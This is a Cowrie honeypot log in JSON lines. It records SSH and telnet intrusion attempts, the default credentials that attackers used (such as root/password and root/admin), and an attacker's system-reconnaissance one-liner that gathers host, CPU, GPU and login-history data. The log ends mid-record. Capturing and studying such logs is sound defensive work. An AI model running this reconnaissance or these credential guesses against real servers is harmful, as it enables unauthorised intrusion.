{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T22:39:27.020152Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:39:27.947752Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:39:28.979013Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.979817Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.980566Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.981790Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.983600Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.984673Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.985428Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.987126Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.987723Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.988329Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.988844Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.989631Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T22:39:28.990278Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T22:39:29.288810Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:39:29.289793Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:39:29.290797Z","src_ip":"196.251.115.108","session":"5e5856aa7d1e"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:39:39.552472Z","src_ip":"212.227.235.229","session":"5f6ab110b282"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@1234","message":"login attempt [root/Aa@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:39:53.914329Z","src_ip":"203.33.225.46","session":"955df138e62e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:39:54.375199Z","src_ip":"203.33.225.46","session":"955df138e62e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35757,"dst_ip":"1.2.3.4","dst_port":23,"session":"c090044896a6","protocol":"telnet","message":"New connection: 212.227.125.160:35757 (1.2.3.4:23) [session: c090044896a6]","sensor":"my-vps","timestamp":"2025-08-28T22:40:16.026145Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":39644,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f8ca4f28f71","protocol":"ssh","message":"New connection: 196.251.115.108:39644 (1.2.3.4:22) [session: 7f8ca4f28f71]","sensor":"my-vps","timestamp":"2025-08-28T22:40:19.388837Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:40:19.724915Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T22:40:19.726065Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.376943Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:40:21.953918Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.954774Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.955313Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.956841Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.957977Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.958914Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.959748Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.960856Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.961683Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.962463Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.962894Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.963579Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-28T22:40:21.964242Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-28T22:40:22.245840Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:40:22.246933Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:40:22.291881Z","src_ip":"196.251.115.108","session":"7f8ca4f28f71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35957,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f8bb3f65b59","protocol":"telnet","message":"New connection: 212.227.125.160:35957 (1.2.3.4:23) [session: 7f8bb3f65b59]","sensor":"my-vps","timestamp":"2025-08-28T22:40:28.342021Z"}
{"eventid":"cowrie.session.closed","duration":13.219832420349121,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:40:29.245904Z","src_ip":"212.227.125.160","session":"c090044896a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35970,"dst_ip":"1.2.3.4","dst_port":23,"session":"419aa2f3d10c","protocol":"telnet","message":"New connection: 212.227.125.160:35970 (1.2.3.4:23) [session: 419aa2f3d10c]","sensor":"my-vps","timestamp":"2025-08-28T22:40:29.488687Z"}
{"eventid":"cowrie.session.closed","duration":12.560483455657959,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:40:40.902408Z","src_ip":"212.227.125.160","session":"7f8bb3f65b59"}
{"eventid":"cowrie.session.closed","duration":12.800669431686401,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:40:42.289251Z","src_ip":"212.227.125.160","session":"419aa2f3d10c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36175,"dst_ip":"1.2.3.4","dst_port":23,"session":"97a6c549e429","protocol":"telnet","message":"New connection: 212.227.125.160:36175 (1.2.3.4:23) [session: 97a6c549e429]","sensor":"my-vps","timestamp":"2025-08-28T22:40:42.487738Z"}
{"eventid":"cowrie.session.connect","src_ip":"36.251.194.42","src_port":48450,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4bc6c9daf84","protocol":"ssh","message":"New connection: 36.251.194.42:48450 (1.2.3.4:22) [session: a4bc6c9daf84]","sensor":"my-vps","timestamp":"2025-08-28T22:40:50.057764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:40:50.058743Z","src_ip":"36.251.194.42","session":"a4bc6c9daf84"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T22:40:50.246803Z","src_ip":"36.251.194.42","session":"a4bc6c9daf84"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-28T22:40:50.816211Z","src_ip":"36.251.194.42","session":"a4bc6c9daf84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48358,"dst_ip":"1.2.3.4","dst_port":22,"session":"0651e21d1082","protocol":"ssh","message":"New connection: 212.227.125.160:48358 (1.2.3.4:22) [session: 0651e21d1082]","sensor":"my-vps","timestamp":"2025-08-28T22:40:53.434211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:40:54.850214Z","src_ip":"212.227.125.160","session":"0651e21d1082"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 